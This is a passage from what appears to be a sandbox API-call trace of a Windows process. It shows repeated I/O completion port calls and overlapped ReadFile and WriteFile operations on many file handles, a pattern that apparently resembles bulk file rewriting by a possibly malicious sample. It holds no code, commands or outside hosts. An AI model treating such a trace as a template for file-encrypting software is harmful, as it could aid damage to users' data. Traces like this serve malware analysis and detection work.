dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 0 [0148.646] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4700020) returned 1 [0148.646] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.646] ReadFile (in: hFile=0x2e0, lpBuffer=0x4b80124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4b80020 | out: lpBuffer=0x4b80124, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4b80020) returned 0x0 [0148.647] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.647] ReadFile (in: hFile=0xd8, lpBuffer=0x4ca0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4ca0020 | out: lpBuffer=0x4ca0124, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4ca0020) returned 0x0 [0148.647] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.647] ReadFile (in: hFile=0x63c, lpBuffer=0x4dc0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4dc0020 | out: lpBuffer=0x4dc0124, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4dc0020) returned 0x0 [0148.647] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 0 [0148.647] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4820020) returned 1 [0148.647] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.647] ReadFile (in: hFile=0x134, lpBuffer=0x4ee0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4ee0020 | out: lpBuffer=0x4ee0124, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4ee0020) returned 0x0 [0148.647] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.647] ReadFile (in: hFile=0x658, lpBuffer=0x5000124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x5000020 | out: lpBuffer=0x5000124, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x5000020) returned 0x0 [0148.647] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 0 [0148.647] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4940020) returned 1 [0148.647] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 0 [0148.647] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4a60020) returned 1 [0148.647] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.648] ReadFile (in: hFile=0x138, lpBuffer=0x5120124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x5120020 | out: lpBuffer=0x5120124, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x5120020) returned 0x0 [0148.648] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.648] WriteFile (in: hFile=0x648, lpBuffer=0x4280094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4280020 | out: lpBuffer=0x4280094*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4280020) returned 1 [0148.648] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.648] WriteFile (in: hFile=0x618, lpBuffer=0x4700094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4700020 | out: lpBuffer=0x4700094*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4700020) returned 1 [0148.648] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 0 [0148.648] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4b80020) returned 1 [0148.648] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 0 [0148.648] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4ca0020) returned 1 [0148.648] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 0 [0148.648] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4dc0020) returned 1 [0148.648] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.648] WriteFile (in: hFile=0x644, lpBuffer=0x4820094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4820020 | out: lpBuffer=0x4820094*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4820020) returned 1 [0148.649] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 0 [0148.649] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4ee0020) returned 1 [0148.649] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 0 [0148.649] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x5000020) returned 1 [0148.649] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.649] WriteFile (in: hFile=0x628, lpBuffer=0x4940094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4940020 | out: lpBuffer=0x4940094*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4940020) returned 1 [0148.649] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.649] WriteFile (in: hFile=0x620, lpBuffer=0x4a60094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4a60020 | out: lpBuffer=0x4a60094*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4a60020) returned 1 [0148.649] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 0 [0148.649] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x5120020) returned 1 [0148.649] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.649] CloseHandle (hObject=0x648) returned 1 [0148.650] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4280020) returned 1 [0148.651] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.652] CloseHandle (hObject=0x618) returned 1 [0148.652] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4700020) returned 1 [0148.653] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.653] WriteFile (in: hFile=0x2e0, lpBuffer=0x4b80094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4b80020 | out: lpBuffer=0x4b80094*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4b80020) returned 1 [0148.653] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.653] WriteFile (in: hFile=0xd8, lpBuffer=0x4ca0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4ca0020 | out: lpBuffer=0x4ca0094*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4ca0020) returned 1 [0148.653] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.653] WriteFile (in: hFile=0x63c, lpBuffer=0x4dc0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4dc0020 | out: lpBuffer=0x4dc0094*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4dc0020) returned 1 [0148.653] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.653] CloseHandle (hObject=0x644) returned 1 [0148.654] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4820020) returned 1 [0148.655] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.655] WriteFile (in: hFile=0x134, lpBuffer=0x4ee0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4ee0020 | out: lpBuffer=0x4ee0094*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4ee0020) returned 1 [0148.655] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.655] WriteFile (in: hFile=0x658, lpBuffer=0x5000094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x5000020 | out: lpBuffer=0x5000094*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x5000020) returned 1 [0148.655] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.655] CloseHandle (hObject=0x628) returned 1 [0148.656] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4940020) returned 1 [0148.656] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.657] CloseHandle (hObject=0x620) returned 1 [0148.657] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4a60020) returned 1 [0148.658] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.658] WriteFile (in: hFile=0x138, lpBuffer=0x5120094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x5120020 | out: lpBuffer=0x5120094*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x5120020) returned 1 [0148.658] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.658] CloseHandle (hObject=0x2e0) returned 1 [0148.659] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4b80020) returned 1 [0148.660] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.660] CloseHandle (hObject=0xd8) returned 1 [0148.660] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4ca0020) returned 1 [0148.661] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.661] CloseHandle (hObject=0x63c) returned 1 [0148.662] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4dc0020) returned 1 [0148.662] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.662] CloseHandle (hObject=0x134) returned 1 [0148.663] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4ee0020) returned 1 [0148.663] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.663] CloseHandle (hObject=0x658) returned 1 [0148.664] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x5000020) returned 1 [0148.664] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.664] CloseHandle (hObject=0x138) returned 1 [0148.665] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x5120020) returned 1 [0148.665] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.911] ReadFile (in: hFile=0x614, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x2f30020) returned 1 [0148.945] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.945] ReadFile (in: hFile=0x674, lpBuffer=0x4280124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124*, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4280020) returned 1 [0148.964] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.964] ReadFile (in: hFile=0x13c, lpBuffer=0x4700124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4700020 | out: lpBuffer=0x4700124*, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4700020) returned 1 [0148.964] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.964] ReadFile (in: hFile=0x650, lpBuffer=0x4820124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4820020 | out: lpBuffer=0x4820124*, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4820020) returned 1 [0148.965] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.965] ReadFile (in: hFile=0x670, lpBuffer=0x4940124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4940020 | out: lpBuffer=0x4940124*, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4940020) returned 1 [0148.965] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.965] ReadFile (in: hFile=0x634, lpBuffer=0x4a60124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3bdfad0, lpOverlapped=0x4a60020 | out: lpBuffer=0x4a60124*, lpNumberOfBytesRead=0x3bdfad0*=0x0, lpOverlapped=0x4a60020) returned 1 [0148.965] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.966] WriteFile (in: hFile=0x614, lpBuffer=0x2f30124*, nNumberOfBytesToWrite=0x18865, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x2f30020) returned 1 [0148.966] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.966] WriteFile (in: hFile=0x674, lpBuffer=0x4280124*, nNumberOfBytesToWrite=0xd4df, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4280020) returned 1 [0148.967] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.967] WriteFile (in: hFile=0x13c, lpBuffer=0x4700124*, nNumberOfBytesToWrite=0x1889, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4700020 | out: lpBuffer=0x4700124*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4700020) returned 1 [0148.967] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.967] WriteFile (in: hFile=0x650, lpBuffer=0x4820124*, nNumberOfBytesToWrite=0x127bd, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4820020 | out: lpBuffer=0x4820124*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4820020) returned 1 [0148.967] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.968] WriteFile (in: hFile=0x670, lpBuffer=0x4940124*, nNumberOfBytesToWrite=0x1170b, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4940020 | out: lpBuffer=0x4940124*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4940020) returned 1 [0148.968] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3bdfad0, lpCompletionKey=0x3bdfacc, lpOverlapped=0x3bdfad4) returned 1 [0148.968] WriteFile (in: hFile=0x634, lpBuffer=0x4a60124*, nNumberOfBytesToWrite=0x13fd, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4a60020 | out: lpBuffer=0x4a60124*, lpNumberOfBytesWritten=0x3bdfad0, lpOverlapped=0x4a60020) returned 1 [0148.968] GetQueuedCompletionStatus (in: CompletionPort=0x5dc, 